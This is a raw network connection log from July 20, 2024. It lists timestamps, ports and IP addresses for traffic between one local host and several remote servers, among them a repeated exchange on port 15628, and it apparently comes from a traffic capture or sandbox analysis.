Jul 20, 2024 16:30:41.435683012 CEST	49731	443	192.168.2.6	77.88.55.88
Jul 20, 2024 16:30:41.435713053 CEST	443	49731	77.88.55.88	192.168.2.6
Jul 20, 2024 16:30:41.435805082 CEST	49731	443	192.168.2.6	77.88.55.88
Jul 20, 2024 16:30:41.436593056 CEST	49729	53	192.168.2.6	8.8.8.8
Jul 20, 2024 16:30:41.440128088 CEST	49733	443	192.168.2.6	142.250.186.132
Jul 20, 2024 16:30:41.440149069 CEST	443	49733	142.250.186.132	192.168.2.6
Jul 20, 2024 16:30:41.440218925 CEST	49733	443	192.168.2.6	142.250.186.132
Jul 20, 2024 16:30:41.441648006 CEST	53	49729	8.8.8.8	192.168.2.6
Jul 20, 2024 16:30:41.441725969 CEST	49729	53	192.168.2.6	8.8.8.8
Jul 20, 2024 16:30:41.441833019 CEST	49733	443	192.168.2.6	142.250.186.132
Jul 20, 2024 16:30:41.441890001 CEST	443	49733	142.250.186.132	192.168.2.6
Jul 20, 2024 16:30:41.441977024 CEST	49733	443	192.168.2.6	142.250.186.132
Jul 20, 2024 16:30:41.553747892 CEST	80	49728	54.251.31.103	192.168.2.6
Jul 20, 2024 16:30:41.647630930 CEST	49728	80	192.168.2.6	54.251.31.103
Jul 20, 2024 16:30:41.682100058 CEST	49734	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:41.682142019 CEST	443	49734	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:41.682229996 CEST	49734	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:41.685605049 CEST	49735	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:41.685638905 CEST	443	49735	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:41.685713053 CEST	49735	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:41.685884953 CEST	49736	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:41.685892105 CEST	443	49736	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:41.685945034 CEST	49736	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:41.924711943 CEST	49736	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:41.924774885 CEST	443	49736	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:41.925277948 CEST	49734	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:41.925357103 CEST	443	49734	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:41.925978899 CEST	49735	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:41.926012039 CEST	443	49735	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:42.151860952 CEST	49737	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:42.151937962 CEST	443	49737	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:42.152096033 CEST	49737	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:42.153028965 CEST	49737	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:42.153074980 CEST	443	49737	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:42.254590988 CEST	80	49728	54.251.31.103	192.168.2.6
Jul 20, 2024 16:30:42.305309057 CEST	49728	80	192.168.2.6	54.251.31.103
Jul 20, 2024 16:30:42.310448885 CEST	80	49728	54.251.31.103	192.168.2.6
Jul 20, 2024 16:30:42.639503956 CEST	80	49728	54.251.31.103	192.168.2.6
Jul 20, 2024 16:30:42.639605999 CEST	49728	80	192.168.2.6	54.251.31.103
Jul 20, 2024 16:30:42.683449030 CEST	443	49734	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:42.683551073 CEST	49734	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:42.686506987 CEST	49734	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:42.686536074 CEST	443	49734	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:42.686628103 CEST	443	49734	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:42.686866999 CEST	49734	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:42.686899900 CEST	443	49734	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:42.704179049 CEST	443	49735	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:42.704277992 CEST	49735	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:42.707510948 CEST	49735	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:42.707535028 CEST	443	49735	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:42.707638025 CEST	443	49735	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:42.707875967 CEST	49735	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:42.707905054 CEST	443	49735	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:42.721391916 CEST	443	49736	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:42.721498013 CEST	49736	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:42.739139080 CEST	49736	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:42.739176035 CEST	443	49736	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:42.739289999 CEST	443	49736	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:42.739522934 CEST	49736	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:42.739548922 CEST	443	49736	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:42.851408958 CEST	49735	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:42.851408958 CEST	49736	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:42.896503925 CEST	443	49734	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:42.896650076 CEST	49734	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:43.336359978 CEST	443	49734	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:43.336469889 CEST	443	49734	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:43.336545944 CEST	49734	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:43.336853981 CEST	49734	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:43.336906910 CEST	443	49734	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:43.336936951 CEST	49734	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:43.336954117 CEST	443	49734	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:43.384479046 CEST	443	49735	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:43.384699106 CEST	443	49735	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:43.384758949 CEST	49735	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:43.384932995 CEST	49735	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:43.384958982 CEST	443	49735	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:43.384973049 CEST	49735	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:43.384980917 CEST	443	49735	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:43.400373936 CEST	443	49736	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:43.400515079 CEST	443	49736	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:43.400577068 CEST	49736	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:43.400851965 CEST	49736	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:43.400851965 CEST	49736	443	192.168.2.6	108.138.187.72
Jul 20, 2024 16:30:43.400860071 CEST	443	49736	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:43.400870085 CEST	443	49736	108.138.187.72	192.168.2.6
Jul 20, 2024 16:30:43.491843939 CEST	443	49737	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:43.491947889 CEST	49737	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:43.494013071 CEST	49737	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:43.494025946 CEST	443	49737	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:43.494246006 CEST	443	49737	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:43.494302988 CEST	49737	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:43.495059967 CEST	49738	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:43.495105028 CEST	443	49738	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:43.495188951 CEST	49738	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:43.495904922 CEST	49738	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:43.495920897 CEST	443	49738	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:45.423088074 CEST	443	49738	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:45.423186064 CEST	49738	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:45.426717043 CEST	49738	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:45.426738024 CEST	443	49738	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:45.427105904 CEST	443	49738	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:45.427175045 CEST	49738	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:45.428751945 CEST	49739	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:30:45.428785086 CEST	443	49739	35.227.223.56	192.168.2.6
Jul 20, 2024 16:30:45.428862095 CEST	49739	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:30:45.431384087 CEST	49739	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:30:45.431396008 CEST	443	49739	35.227.223.56	192.168.2.6
Jul 20, 2024 16:30:46.461420059 CEST	443	49739	35.227.223.56	192.168.2.6
Jul 20, 2024 16:30:46.461503029 CEST	49739	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:30:46.462456942 CEST	443	49739	35.227.223.56	192.168.2.6
Jul 20, 2024 16:30:46.462516069 CEST	49739	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:30:46.592159986 CEST	49739	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:30:46.592175961 CEST	443	49739	35.227.223.56	192.168.2.6
Jul 20, 2024 16:30:46.592525959 CEST	443	49739	35.227.223.56	192.168.2.6
Jul 20, 2024 16:30:46.592894077 CEST	49739	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:30:46.593256950 CEST	49741	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:46.593350887 CEST	443	49741	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:46.593457937 CEST	49741	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:46.594290972 CEST	49741	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:46.594327927 CEST	443	49741	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:47.967951059 CEST	443	49741	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:47.968035936 CEST	49741	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:47.970460892 CEST	49741	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:47.970488071 CEST	443	49741	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:47.970729113 CEST	443	49741	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:47.970792055 CEST	49741	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:47.971414089 CEST	49742	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:47.971455097 CEST	443	49742	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:47.971523046 CEST	49742	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:47.972348928 CEST	49742	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:47.972359896 CEST	443	49742	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:49.261740923 CEST	443	49742	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:49.261873007 CEST	49742	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:49.264410019 CEST	49742	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:49.264422894 CEST	443	49742	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:49.264838934 CEST	443	49742	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:49.264909983 CEST	49742	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:49.265681028 CEST	49743	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:49.265721083 CEST	443	49743	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:49.265803099 CEST	49743	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:49.334187984 CEST	49743	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:49.334216118 CEST	443	49743	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:50.876795053 CEST	443	49743	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:50.876899958 CEST	49743	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:50.880798101 CEST	49743	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:50.880817890 CEST	443	49743	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:50.881038904 CEST	443	49743	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:50.881150007 CEST	49743	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:50.891079903 CEST	49744	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:50.891175032 CEST	443	49744	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:50.891510010 CEST	49744	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:50.892432928 CEST	49744	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:50.892468929 CEST	443	49744	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:52.198649883 CEST	443	49744	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:52.198785067 CEST	49744	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:52.200174093 CEST	49744	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:52.200198889 CEST	443	49744	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:52.200644970 CEST	443	49744	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:52.200714111 CEST	49744	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:52.202651024 CEST	49745	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:52.202682018 CEST	443	49745	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:52.202747107 CEST	49745	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:52.203743935 CEST	49745	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:52.203759909 CEST	443	49745	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:53.607357979 CEST	443	49745	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:53.607462883 CEST	49745	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:53.611938000 CEST	49745	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:53.611954927 CEST	443	49745	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:53.612382889 CEST	443	49745	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:53.612454891 CEST	49745	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:53.613677979 CEST	49746	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:53.613699913 CEST	443	49746	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:53.613890886 CEST	49746	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:53.615503073 CEST	49746	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:53.615516901 CEST	443	49746	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:54.901587963 CEST	443	49746	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:54.901690960 CEST	49746	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:54.903314114 CEST	49746	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:54.903326988 CEST	443	49746	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:54.903527021 CEST	443	49746	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:54.903579950 CEST	49746	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:54.904201984 CEST	49747	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:54.904236078 CEST	443	49747	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:54.904297113 CEST	49747	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:54.904906034 CEST	49747	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:54.904922962 CEST	443	49747	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:55.536007881 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:30:55.870650053 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:30:56.211591005 CEST	443	49747	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:56.211690903 CEST	49747	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:56.214801073 CEST	49747	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:56.214808941 CEST	443	49747	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:56.215019941 CEST	443	49747	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:56.215126991 CEST	49747	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:56.216511965 CEST	49748	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:56.216542006 CEST	443	49748	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:56.216676950 CEST	49748	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:56.217766047 CEST	49748	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:56.217781067 CEST	443	49748	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:56.226587057 CEST	49744	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:56.226612091 CEST	49737	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:56.226664066 CEST	443	49744	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:56.226699114 CEST	443	49737	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:56.226810932 CEST	49746	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:56.226825953 CEST	443	49746	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:56.226887941 CEST	49745	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:56.226893902 CEST	443	49745	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:56.226928949 CEST	49741	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:56.226948023 CEST	49738	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:56.226964951 CEST	443	49741	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:56.226974964 CEST	443	49738	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:56.227060080 CEST	49743	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:56.227078915 CEST	443	49743	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:56.227104902 CEST	49742	443	192.168.2.6	23.98.101.155
Jul 20, 2024 16:30:56.227113962 CEST	49747	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:56.227116108 CEST	443	49742	23.98.101.155	192.168.2.6
Jul 20, 2024 16:30:56.227128029 CEST	443	49747	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:56.227137089 CEST	49739	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:30:56.227144003 CEST	443	49739	35.227.223.56	192.168.2.6
Jul 20, 2024 16:30:57.582382917 CEST	443	49748	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:57.582469940 CEST	49748	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:57.585417986 CEST	49748	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:57.585429907 CEST	443	49748	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:57.585634947 CEST	443	49748	183.60.146.66	192.168.2.6
Jul 20, 2024 16:30:57.585688114 CEST	49748	443	192.168.2.6	183.60.146.66
Jul 20, 2024 16:30:57.588989019 CEST	49749	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:30:57.589032888 CEST	443	49749	35.227.223.56	192.168.2.6
Jul 20, 2024 16:30:57.589097023 CEST	49749	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:30:57.598057032 CEST	49749	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:30:57.598079920 CEST	443	49749	35.227.223.56	192.168.2.6
Jul 20, 2024 16:30:58.794754982 CEST	443	49749	35.227.223.56	192.168.2.6
Jul 20, 2024 16:30:58.794943094 CEST	49749	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:30:58.796912909 CEST	49749	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:30:58.796925068 CEST	443	49749	35.227.223.56	192.168.2.6
Jul 20, 2024 16:30:58.797329903 CEST	443	49749	35.227.223.56	192.168.2.6
Jul 20, 2024 16:30:58.797388077 CEST	49749	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:30:58.798669100 CEST	49750	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:30:58.798696995 CEST	443	49750	35.227.223.56	192.168.2.6
Jul 20, 2024 16:30:58.798947096 CEST	49750	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:30:58.799583912 CEST	49750	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:30:58.799596071 CEST	443	49750	35.227.223.56	192.168.2.6
Jul 20, 2024 16:31:00.230575085 CEST	443	49750	35.227.223.56	192.168.2.6
Jul 20, 2024 16:31:00.230706930 CEST	49750	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:31:00.231784105 CEST	443	49750	35.227.223.56	192.168.2.6
Jul 20, 2024 16:31:00.231848001 CEST	49750	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:31:00.232986927 CEST	49750	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:31:00.232995033 CEST	443	49750	35.227.223.56	192.168.2.6
Jul 20, 2024 16:31:00.233191967 CEST	443	49750	35.227.223.56	192.168.2.6
Jul 20, 2024 16:31:00.233246088 CEST	49750	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:31:00.234246969 CEST	49752	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:31:00.234299898 CEST	443	49752	35.227.223.56	192.168.2.6
Jul 20, 2024 16:31:00.234420061 CEST	49752	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:31:00.235264063 CEST	49752	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:31:00.235301971 CEST	443	49752	35.227.223.56	192.168.2.6
Jul 20, 2024 16:31:01.315867901 CEST	443	49752	35.227.223.56	192.168.2.6
Jul 20, 2024 16:31:01.315951109 CEST	49752	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:31:01.317509890 CEST	49752	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:31:01.317523003 CEST	443	49752	35.227.223.56	192.168.2.6
Jul 20, 2024 16:31:01.317778111 CEST	443	49752	35.227.223.56	192.168.2.6
Jul 20, 2024 16:31:01.317827940 CEST	49752	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:31:01.318630934 CEST	49754	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:31:01.318679094 CEST	443	49754	35.227.223.56	192.168.2.6
Jul 20, 2024 16:31:01.318737984 CEST	49754	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:31:01.319432020 CEST	49754	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:31:01.319446087 CEST	443	49754	35.227.223.56	192.168.2.6
Jul 20, 2024 16:31:02.540594101 CEST	443	49754	35.227.223.56	192.168.2.6
Jul 20, 2024 16:31:02.540680885 CEST	49754	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:31:02.541655064 CEST	443	49754	35.227.223.56	192.168.2.6
Jul 20, 2024 16:31:02.541712999 CEST	49754	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:31:02.542263031 CEST	49754	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:31:02.542269945 CEST	443	49754	35.227.223.56	192.168.2.6
Jul 20, 2024 16:31:02.542462111 CEST	443	49754	35.227.223.56	192.168.2.6
Jul 20, 2024 16:31:02.542522907 CEST	49754	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:31:03.105988026 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:03.110996962 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:05.975977898 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:05.985807896 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:07.229994059 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:07.235183001 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:07.772806883 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:07.778785944 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:08.269850016 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:08.275207043 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:08.750158072 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.032612085 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.063030958 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.095778942 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.140033007 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.203288078 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.230446100 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.256505013 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.283689022 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.311685085 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.324400902 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.349054098 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.349093914 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.791836977 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.791879892 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.791906118 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.791908979 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.792037010 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.793135881 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.793308973 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.793446064 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.794133902 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.794162035 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.794189930 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.794307947 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.794333935 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.794471979 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.794781923 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.795079947 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.795108080 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.795135021 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.795218945 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.795277119 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.795406103 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.795406103 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.795747042 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.795775890 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.795804024 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.795834064 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.795989990 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.796016932 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.796221972 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.796665907 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.797003984 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.797032118 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.798582077 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.799302101 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.799455881 CEST	15628	49722	154.204.0.5	192.168.2.6
